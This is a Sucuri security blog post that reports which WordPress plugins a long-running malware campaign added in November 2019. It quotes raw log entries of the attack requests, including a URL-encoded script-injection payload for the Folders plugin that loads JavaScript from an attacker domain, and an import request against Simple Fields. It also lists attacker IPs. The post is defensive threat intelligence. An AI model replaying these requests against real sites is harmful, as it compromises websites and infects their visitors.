• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Plugins added to Malware Campaign: November 2019

December 2, 2019John Castro

FacebookTwitterSubscribe

This is an update for the long-lasting malware campaign targeting vulnerable plugins since January. Please check our previous updates below:

  • Multi-Vector Attack in Server Logs: March 2019
  • Plugins Added to Malicious Campaign – April 2019
  • Malware Campaign Evolves to Target New Plugins: May 2019
  • Plugins Under Attack: June 2019
  • Plugins Under Attack: July 2019
  • Plugins Under Attack: August 2019
  • Plugins Under Attack: September 2019
  • Plugins Under Attack: October 2019

Plugins Under Attack: November 2019

Although attackers focused on infecting sites via attack vectors described here, we were able to detect the same behavior aiming plugins at the very end of this month.

  • Folders
  • Simple Fields

Plugins that are continuing to be leveraged by attackers are:

  • Rich Reviews
  • Kiwi-Social-Share
  • Blog Designer
  • WP Live Chat Support
  • Yellow Pencil Visual Theme Customizer
  • Social Warfare
  • Yuzo Related Post
  • WP-Piwik

Plugin Payloads Added to the Campaign

Folders

46.101.174.128 - type=attachment&width=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Ftop.worldctraffic.com%2Ftop%27%3E%3C%2Fscript%3E%3Cstyle%3E [23/Nov/2019:12:19:33 +0000] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1" 

Simple Fields

46.101.174.128 - action=simple_fields_do_import&import-json=%7B%0A++++%22field_groups%22%3A+%7B%0A++++++++%221%22%3A+%7B%0A++++++++++++%22id%22%3A+1%2C%0A++++++++++++%22key%22%3A+%22test%22%2C%0A++++++++++++%22slug%22%3A+%22test%22%2C%0A++++++++++++%22name%22%3A+%22test%22%2C%0A++++++++++++%22description%22%3A+%22%22%2C%0A++++++++++++%22repeatable%22%3A+false%2C%0A++++++++++++%22fields%22%3A+%5B%5D%2C%0A++++++++++++%22fields_by_slug%22%3A+%5B%5D%2C%0A++++++++++++%22deleted%22%3A+false%2C%0A++++++++++++%22gui_view%...skipped...%22deleted%22%3A+false%2C%0A++++++++++++%22hide_editor%22%3A+false%2C%0A++++++++++++%22added_with_code%22%3A+false%2C%0A++++++++++++%22field_groups_count%22%3A+1%0A++++++++%7D%0A++++%7D%2C%0A++++%22post_type_defaults%22%3A+%5B%0A++++++++false%0A++++%5D%0A%7D&import-what=textarea&simple-fields-import-type=replace [23/Nov/2019:13:02:05 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 

Malicious Domains and IPs:

IPs:

198.12.70.83
89.238.167.46
181.58.70.192
84.237.142.110
91.215.187.211
46.101.174.128

Domains Injected:

  • https[:]//top[.]worldctraffic[.]com/cas?/java.js?t=2&

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, WordPress SecurityTags: Labs Note, Malware, WordPress Plugins and Themes

About John Castro

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPres plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.